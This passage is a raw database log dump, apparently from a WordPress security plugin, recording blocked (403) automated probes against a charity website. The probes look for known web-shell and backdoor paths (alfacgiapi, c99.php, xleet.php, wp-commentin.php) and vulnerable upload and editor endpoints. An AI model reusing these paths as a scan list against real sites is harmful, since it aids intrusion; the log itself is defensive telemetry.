Safari\\/537.36\"}','do7PmbiINkEQpT6Yv4HAcLOa',0,1674462310.6698,99,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/wp/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','juO75f1lsUoxAZTNc8kMLgiw',0,1674462312.6313,117,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/wp/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','lZWAKhXv74UrV9nTmioepuzd',0,1674462312.9488,112,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/wp/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','NCfaYBPxUo5n8h2HrZLm71Vt',0,1674462313.2462,88,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/wp/ALFA_DATA/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','HBQtWZlPzSrAxs9dwMfap52y',0,1674462315.2687,153,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/wp/ALFA_DATA/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','8B30HTC56DFixAl4VeUM7JmZ',0,1674462315.5948,98,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/wp/ALFA_DATA/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','6ivRsAc3ldZaTHYog4LWU92P',0,1674462315.8842,110,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/blog/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','QNEx218tSk9lYyDzvMRGXnra',0,1674462317.8919,111,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/blog/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','26dbmEO9yZiArtHnBYWvsoa8',0,1674462318.1804,94,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/blog/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','a0BORqmpzLw5ZA6KJtYhMjSl',0,1674462318.4532,90,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/blog/ALFA_DATA/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','ujkt83IYyrmBOq5zoXlVcZ9W',0,1674462320.4645,95,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/blog/ALFA_DATA/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','MRuWrkojfIFDUZm0A7t2Xy5h',0,1674462320.7446,136,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/blog/ALFA_DATA/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','2FSTv9AwHduUonl6cXNIP3ai',0,1674462321.0705,176,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/new/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','n0euQSktfldgRXPpiKNJV7FM',0,1674462323.3648,126,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/new/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','gAzVYS4jyboJI3fPWuHRi2Gh',0,1674462323.6928,109,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/new/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','DfZNS8kxU6TrzoKu7sbPG3My',0,1674462323.9787,238,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/new/ALFA_DATA/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','j81Z4Y90FbwoA6aG2S3P7OTi',0,1674462326.2176,112,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/new/ALFA_DATA/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','kvteF5iLRCZBS80My1zmXIJf',0,1674462326.4981,92,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/new/ALFA_DATA/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','74fbQiopuFRPBC6qDtYyve9a',0,1674462326.7700,144,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/old/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','czaN71ubEH4fOnkK2GgWoB5q',0,1674462328.7514,131,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/old/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','Lsdkg2NFOKUlcBvjYQbpMJ0t',0,1674462329.0703,100,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/old/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','gbA0srxXJZjv7kWRGOizcVPl',0,1674462329.3558,102,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/old/ALFA_DATA/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','zw82qYPZanfBrE4Q61UiVjcI',0,1674462331.6851,130,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/old/ALFA_DATA/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','QcSxW9hGnYBZvR4OibgX2Ko8',0,1674462331.9881,443,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/old/ALFA_DATA/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','oZiJ0F18KwNhn27BjvS9abdH',0,1674462332.6529,94,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/backup/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','iMOz17UeTxmA6PdtcrfYHVL8',0,1674462334.8818,104,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/backup/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','uDt1Zs0ikNAPaUK8HzR4xXfv',0,1674462335.1825,117,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/backup/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','p4V6lf0mgnJqANaYbZM8L3RK',0,1674462335.4789,94,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/backup/ALFA_DATA/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','SDf6YU8TP10kyZx4a39E7IeC',0,1674462337.4208,101,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/backup/ALFA_DATA/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','JRjBDMrqP2u58lA4g61bSfOT',0,1674462337.7211,119,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/backup/ALFA_DATA/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','b3AOjJGFxWtmgMelRN9KZ152',0,1674462338.0089,99,'','GET',403,0,700,0,1,'',0),('20.203.135.203',348882891,'','https://www.equalitywalk.org.uk/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','ACfFIvlw0DprXeqs23jYt4y1',0,1674465928.1093,179,'','GET',403,0,700,0,1,'',0),('20.203.135.203',348882891,'','https://www.equalitywalk.org.uk/wp-class.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','Zzx7aFiE46nlCwXIULAdvQ20',0,1674465929.0924,121,'','GET',403,0,700,0,1,'',0),('20.203.135.203',348882891,'','https://www.equalitywalk.org.uk/upload.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','2e89lVYh54Af7jPabQqOFNDM',0,1674465929.3896,125,'','GET',403,0,700,0,1,'',0),('20.203.135.203',348882891,'','https://www.equalitywalk.org.uk/wp__config.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','dHZJYp1uElUFPgSrODMkTab6',0,1674465930.3524,97,'','GET',403,0,700,0,1,'',0),('20.203.135.203',348882891,'','https://www.equalitywalk.org.uk/wp-admin/wp__config.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','7kONuHidUrtqY1x85VB0vLFM',0,1674465930.8807,93,'','GET',403,0,700,0,1,'',0),('20.203.135.203',348882891,'','https://www.equalitywalk.org.uk/wp/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','hcQZSms7wdTAo5j8Lg4lFWKu',0,1674465931.1769,87,'','GET',403,0,700,0,1,'',0),('20.203.135.203',348882891,'','https://www.equalitywalk.org.uk/wordpress/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','Uw9xW3KpJTkMHOurIlZt4dBY',0,1674465932.1728,115,'','GET',403,0,700,0,1,'',0),('20.203.135.203',348882891,'','https://www.equalitywalk.org.uk/blog/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','yRTHf3Ovh5UMtWGAZIqpKwQz',0,1674465933.1068,86,'','GET',403,0,700,0,1,'',0),('20.203.135.203',348882891,'','https://www.equalitywalk.org.uk/site/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','evs5GJDhi68dVzS7w4YjpBAu',0,1674465934.3956,93,'','GET',403,0,700,0,1,'',0),('194.38.20.161',3257275553,'','https://equalitywalk.org.uk/administrator/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php','','{\"1\":\"ALittle Client\"}','8YtDP30sckjOpE7H2XrJSieG',0,1674483254.6301,150,'','GET',403,0,700,0,1,'',0),('185.36.81.21',3106165013,'','https://equalitywalk.org.uk/editor/editor/filemanager/browser/default/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=File&CurrentFolder=','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/75.0.3770.100 Safari\\/537.36\"}','POdxKcRDfbl17NFChQG9iJst',0,1674484905.1754,123,'','GET',403,0,700,0,1,'',0),('157.245.41.15',2650089743,'','https://equalitywalk.org.uk/wp-admin/js/widgets/content.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit\\/533.4 (KHTML, like Gecko) Chrome\\/5.0.375.99 Safari\\/533.4\",\"2\":\"http:\\/\\/equalitywalk.org.uk\\/wp-admin\\/js\\/widgets\\/content.php\"}','LWmJRnOK2cTeHrqdbawNZ6SU',0,1674487364.3429,115,'','GET',403,0,700,0,1,'',0),('157.245.41.15',2650089743,'','https://equalitywalk.org.uk/wp-admin/js/widgets/content.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit\\/533.4 (KHTML, like Gecko) Chrome\\/5.0.375.99 Safari\\/533.4\",\"2\":\"http:\\/\\/equalitywalk.org.uk\\/wp-admin\\/js\\/widgets\\/content.php\"}','x25npDMX4advsk710OouY9Ty',0,1674487368.0824,94,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/xleet.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','lWidT0SaAwmHj6ChQKJZxP5u',0,1674488117.4815,393,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/0byte.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','rfH2CLUAoOW6acKelyjdknYG',0,1674488118.5637,98,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/sym.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','8hejpMmcfdDARyovT4EaWQ6Z',0,1674488120.0148,88,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/sym403.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','wzpChuXTSZGQxAvgH7m6EV93',0,1674488120.7876,175,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/xl.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','8XzvIyUwNDEmWKZa6G7rkFsl',0,1674488121.6619,101,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/symlink.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','lcrJU7qmXRADCTxVI3ovP6wp',0,1674488122.4792,94,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/wp.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','MCSIR3VhsBxnFJNZ0XmGYgzi',0,1674488123.2771,95,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/404.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','z5D0QbkSXIJAGmuYwtRECNqL',0,1674488124.0619,124,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/403.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','9hSBgyV0xpZtMqGLz6bEuvoa',0,1674488124.8807,102,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/up.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','Xp138FPqVgW0CZDUQmvNnRxS',0,1674488125.6701,93,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/c99.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','PHdKaCrvNuMt3w2DjzVTkcJh',0,1674488126.4488,91,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/xxx.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','I39ZA6BdrwQ4q57Uk0KutnXp',0,1674488127.2552,111,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/ok.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','YWbyONjlVcL784Cd6B2ZGSgw',0,1674488128.0632,124,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/0.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','ODqvH1TtcPpWSJCKf8jUbk5N',0,1674488128.8960,127,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/x.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','4HZgq2bu1G96j5sXMmlOWxcw',0,1674488129.7170,107,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/xx.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','EW6xiSRgYB4UhokrVeJvCt30',0,1674488130.5106,86,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/1.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','tw9PJqpDn1K7VSAzxyTQZhWr',0,1674488131.2957,111,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/2.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','pK1a0OS4Ibq6AXgdrJHm8CcY',0,1674488132.0928,91,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/3.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','F2KLPOtmwAq61dUsa0ZklDJ7',0,1674488132.8666,120,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/4.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','dIuEXwiAPCv5D8Tz6nj7SBV1',0,1674488133.6712,107,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/5.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','9ktViImBTROnwfUCdQ3alx40',0,1674488134.5098,106,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/6.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','EmGP2eXosZhwbjH3TQBOtJ8k',0,1674488135.3186,118,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/7.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','VLSIYQgaultkPA7ZebUOwT4r',0,1674488136.1189,86,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/8.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','8laoFvkpJdesXQtu5yDcKENj',0,1674488136.9120,96,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/9.php','','{\"1\":\"Mozilla\\/5.0 